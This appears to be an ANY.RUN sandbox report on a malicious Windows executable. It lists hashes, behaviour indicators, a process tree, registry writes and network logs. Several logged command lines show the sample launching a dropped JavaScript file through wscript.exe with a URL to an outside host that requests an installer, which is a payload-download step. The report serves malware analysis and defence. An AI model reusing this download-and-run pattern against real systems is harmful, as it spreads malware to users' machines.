File name:

2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee

Full analysis: https://app.any.run/tasks/902bfb2a-4702-46be-872f-22da51e0755d
Verdict: Malicious activity
Analysis date: June 16, 2025, 12:51:40
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

006A97496368C86C7451FBEEEFE58E29

SHA1:

44EB15DE11DB43A3F10262314AFFF2F780F5B096

SHA256:

EC2A58E6A761E01EA7EE9B6A7C1657426E04DA64FC1BDB8036C613C8C6822EB4

SSDEEP:

3072:/kGn8cgEde45laEReU7ZtEnvTjx/TQMNJ9ztRqILacKdjh70OEFI6DIEXZW+5T7T:/3gwx55tEnvXhTQQJ5qzcKdjh7ULp7gU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 1712)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • Accesses command line arguments (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)

    • The process executes JS scripts

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • The process downloads a VBScript from the remote host

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

  • INFO

    • Create files in a temporary directory

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • Reads the computer name

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • Process checks computer location settings

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • Checks supported languages

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)

    • Checks proxy server information

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)
      • slui.exe (PID: 5496)

    • Reads the software policy settings

      • slui.exe (PID: 5496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2015:08:03 09:35:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 10
CodeSize: 113152
InitializedDataSize: 75776
UninitializedDataSize: -
EntryPoint: 0xe29c
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe wscript.exe no specs wscript.exe no specs wscript.exe no specs wscript.exe no specs wscript.exe no specs slui.exe 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
632"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exeC:\Windows\SysWOW64\wscript.exe2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1564"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exeC:\Windows\SysWOW64\wscript.exe2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1712"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exeC:\Windows\SysWOW64\wscript.exe2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3640"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exeC:\Windows\SysWOW64\wscript.exe2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5020"C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe" C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5496C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6344"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exeC:\Windows\SysWOW64\wscript.exe2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6360"C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe" C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events
7 929
Read events
7 908
Write events
21
Delete events
0

Modification events

(PID) Process:(1564) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1564) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1564) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6360) 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(1564) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
797B170000000000
(PID) Process:(632) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(632) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(632) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6344) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6344) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
0
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
63602025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exeC:\Users\admin\AppData\Local\Temp\fuf69B6.jstext
MD5:3813CAB188D1DE6F92F8B82C2059991B
SHA256:A3C5BAEF033D6A5AB2BABDDCFC70FFFE5CFBCEF04F9A57F60DDF21A2EA0A876E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
42
DNS requests
27
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1508
RUXIMICS.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1508
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
304
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
POST
200
20.190.160.22:443
https://login.live.com/RST2.srf
unknown
xml
11.1 Kb
whitelisted
GET
200
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
POST
200
40.126.32.76:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1508
RUXIMICS.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1508
RUXIMICS.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.181.238
whitelisted
www.djapp.info
unknown
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.37
  • 2.16.241.19
  • 2.16.241.12
whitelisted
bi.downthat.com
unknown
www.microsoft.com
  • 95.101.149.131
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.32.76
  • 40.126.32.138
  • 20.190.160.22
  • 20.190.160.131
  • 40.126.32.68
  • 20.190.160.20
  • 20.190.160.66
  • 40.126.32.74
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee